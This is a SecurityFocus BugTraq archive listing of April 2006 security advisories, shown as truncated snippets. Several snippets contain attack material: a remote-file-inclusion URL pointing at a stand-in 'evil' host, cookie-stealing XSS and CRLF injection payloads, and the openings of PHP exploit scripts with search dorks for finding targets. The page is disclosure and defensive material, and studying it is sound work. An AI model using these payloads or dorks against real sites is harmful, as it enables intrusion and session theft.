BugTraq (Page 1169 of 1748)
ZDI-06-007: Microsoft Windows Address Book (WAB) File Format Parsing Vulnerability 2006-04-11
zdi-disclosures 3com com
ZDI-06-007: Microsoft Windows Address Book (WAB) File Format Parsing
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-007.html
April 11, 2006

-- CVE ID:
CVE-2006-0014

-- Affected Vendor:
Microsoft

-- Affected Products:
Windows XP SP2
Windows 2000 SP4

-- TippingPoint(TM) IPS Cust

[eVuln] [V]Book Multiple Vulnerabilities 2006-04-11
alex evuln com
New eVuln Advisory:
[V]Book Multiple Vulnerabilities
http://evuln.com/vulns/111/summary.html

--------------------Summary----------------
eVuln ID: EV0111
CVE: CVE-2006-1561 CVE-2006-1562 CVE-2006-1563
Software: [V]Book
Software's Web Site: http://www.vscripts.pl/?id=vbook2
Versions: 2.0
Critical Le

Realplayer .SWF Multiple Remote Memory Corruption Vulnerabilities 2006-04-11
Sowhat (smaillist gmail com)
Realplayer .SWF Multiple Remote Memory Corruption Vulnerabilities

By Sowhat of Nevis Labs
Date: 2006.03.22

http://www.nevisnetworks.com
http://secway.org/advisory/AD20060322.txt

CVE: CVE-2006-0323
US CERT: VU#231028

Vendor
RealNetworks Inc.

Products affected:

Windows
RealPlayer 8
RealOne Playe

phpListPro <= 2.0 - Remote File Include Vulnerability 2006-04-11
admin majorsecurity de
phpListPro <= 2.0 - Remote File Include Vulnerability
--------------------------------------------------------
Software: phpListPro
Version: <=2.00
Type: Remote File Include Vulnerability
Date: April, 11th 2006
Vendor: SmartISoft
Page: http://smartisoft.com
Risk: High

Credits:
------------------

Multiple vulnerabilities in Blur6ex 2006-04-11
crasher kecoak or id

[ MDKSA-2006:069 ] - Updated openvpn packages fix vulnerability 2006-04-11
security mandriva com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDKSA-2006:069
http://www.mandriva.com/security/
____________________________________________________________________

INDEXU <= 5.0.1 (theme_path)and (base_path) Remote File Inclusion Exploit 2006-04-11
selfar2002 hotmail com

Application : Indexu
version : 5.0.0 5.0.1
URL : http://www.nicecoder.com/

Vulnerable:# INDEXU <= 5.0.1 (theme_path)and (base_path) Remote File Inclusion Exploit

Discovery by SnIpEr_SA

in (theme_path)
this file :
exploit:
http://example.com/indexu/index.php?theme_path=http://evil.t

Re: PHPList <= 2.10.2 remote commands execution 2006-04-11
secfoc tincan co uk

This vulnerability is caused by the PHP globals problem. http://www.hardened-php.net/globals-problem

Not vulnerable: PHP 4.4.1 and up or PHP 5.1.0 and up

Fix:

add

$GLOBALS = array();

to the top of the config file

Confixx 3.1.2 <= Cross Site Scripting Vuln 2006-04-10
sn4k3 23 gmail com
// Confixx 3.1.2 <= Cross Site Scripting Vuln //

-----------------------------------------------------------------

[~] Advisory by: LoK-Crew ~ Snake_23

[-] Exploit: http://www.victim.com/allgemein_transfer.php?monat=4&jahr=[XSS]

[-] Googledork: -

[+] Greetz to: Bluegeek and Team.Rootbox
[+] V

[USN-269-1] xscreensaver vulnerability 2006-04-11
Martin Pitt (martin pitt canonical com)
===========================================================
Ubuntu Security Notice USN-269-1 April 11, 2006
xscreensaver vulnerability
CVE-2004-2655
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

PHPWebGallery Multiple Cross Site Scripting Vulnerabilities 2006-04-10
root__ linuxmail org
Title : PHPWebGallery Multiple Cross Site Scripting Vulnerabilities
Author: Mourad aka Psych0 <root__ at linuxmail org>
Moroccan Security Team
Vendor: www.phpwebgallery.net
Software: PHPWebGallery
Version: 1.4.1

category.php and picture.php scripts are vulnerable to XSS attacks.

Exploits:

http:/

phpMyForum Cross Site Scripting & CRLF injection 2006-04-10
root__ linuxmail org
Title : phpMyForum Cross Site Scripting & CRLF injection
Author: Mourad aka Psych0
Moroccan Security Team
Vendor: www.phpmyforum.de
Version: 4.0

Examples:

http://target/path/index.php?page=[xsscode]&type=text%2Fcss

http://target/path/index.php?template=css&type=some_url%0d%0aSet-Cookie%3Aheader

Jbook Cross Site Scripting 2006-04-10
root__ linuxmail org
Title : Jbook Cross Site Scripting
Author: Mourad aka Psych0
Moroccan Security Team
Vendor: www.jmuller.net
Version: 1.3

Jbook Guestbook is a PHP/MySQL based guestbook script.

Vulnerability in index.php, this issue can allow an
attacker to bypass content filters and potentially carry out xss atta

[eVuln] phpNewsManager Multiple SQL Injections 2006-04-10
alex evuln com
New eVuln Advisory:
phpNewsManager Multiple SQL Injections
http://evuln.com/vulns/110/summary.html

--------------------Summary----------------
eVuln ID: EV0110
CVE: CVE-2006-1560
Vendor: SkinTech Group
Vendor's Web Site: http://www.skintech.org/
Software: phpNewsManager
Versions: 1.48
Critical Leve

PHPList <= 2.10.2 remote commands execution 2006-04-10
rgod autistici org
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "PHPList <= 2.10.2 GLOBALS[] remote cmmnds xctn \r\n";
echo "by rgod rgod (at) autistici (dot) org [email concealed]\r\n";
echo "site: http://retrogod.altervista.org\r\n\r\n";
echo "-> this works against register_globals=On \r\n";
echo "a dork: inurl:\"lists/?p=subscribe\" | inurl:

Vegadns blind sql injection and cross site scripting 2006-04-10
king_purba yahoo co uk
Author : Ph03n1X
email : king_purba (at) yahoo.co (dot) uk
site : http://kandangjamur.net/
vendor : www.vegadns.org
version: 0.99

XSS
----
PoC :
http://exam.com/vegadns/index.php?VDNS_Sessid=m42644r75o1eg4f7mb7e4rnpg7&message=%3Ch1%3E%3Cmarquee%3Ealoo%3C/marquee%3E%3C/h1%3E

Vulnerable script is located in

Myspace.com - Intricate Script Injection 2006-04-09
silentproducts gmail com
Original: http://www.silent-products.com/advisory4.5.06.txt

Myspace.com - Intricate Script Injection Vulnerability
Reported April 5th, 2006

Introduction
----------------
The following article details a real vulnerability within the major social network Myspace.com. The seriousness of this script i

MyBB 1.10 'newthread.php' < CrossSiteScripting > 2006-04-09
o y 6 hotmail com
MyBB 1.10 'newthread.php' < CrossSiteScripting >

[ Devil-00 | D3vil-0x1 ]

[*] Conditions [*]
1- you are an unregistered user
2- you have permissions to do newthread

[---------------]

do newthread with this username :-

<script>alert(document.cookie);</script>D3vil-0x1

Then Preview it ;)

[-----------

copy() Safe Mode Bypass PHP 4.4.2 and 5.1.2 2006-04-09
cxib securityreason com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[copy() Safe Mode Bypass PHP 4.4.2 and 5.1.2]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 2.4.2006
- -Public: 8.4.2006
from SECURITYREASON.COM
CVE-2006-1608

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of it

tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2 2006-04-09
cxib securityreason com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 26.3.2006
- -Public: 8.4.2006
from SECURITYREASON.COM
CVE-2006-1494

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Muc

function *() php/apache Crash PHP 4.4.2 and 5.1.2 2006-04-09
cxib securityreason com (1 replies)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[function *() php/apache Crash PHP 4.4.2 and 5.1.2]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 21.3.2006
- -Public: 8.4.2006
from SECURITYREASON.COM
CVE-2006-1549

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Muc

Re: function *() php/apache Crash PHP 4.4.2 and 5.1.2 2006-04-10
Michal Zalewski (lcamtuf dione ids pl)
phpinfo() Cross Site Scripting PHP 5.1.2 and 4.4.2 2006-04-09
cxib securityreason com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[phpinfo() Cross Site Scripting PHP 5.1.2 and 4.4.2]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 26.2.2006
- -Public: 8.4.2006
from SecurityReason.Com
CVE-2006-0996

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Mu

PhpOpenChat 3.0.x ADODB Server.php "sql" SQL injection 2006-04-09
rgod autistici org
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "PhpOpenChat 3.0.x ADODB Server.php \"sql\" SQL injection\r\n";
echo "by rgod rgod (at) autistici (dot) org [email concealed]\r\n";
echo "site: http://retrogod.altervista.org\r\n\r\n";
echo "dork: Welcome to your PHPOpenChat-Installation!\r\n\r\n";

if ($argc<4) {
echo "Usage: php

Vulnerabilities in SPIP 2006-04-09
crasher kecoak or id

Oracle read-only user can insert/update/delete data via specially crafted views 2006-04-10
ak red-database-security com
Dear bugtraq-Reader

Last Thursday 6th April 2006, Oracle released a note on the Oracle knowledgebase Metalink with details about an unfixed security vulnerability (=0day) and a working test case (=exploit code) which affects all versions of Oracle from 9.2.0.0 to 10.2.0.3. This note "363848.1 - A U

Copyright 2010, SecurityFocus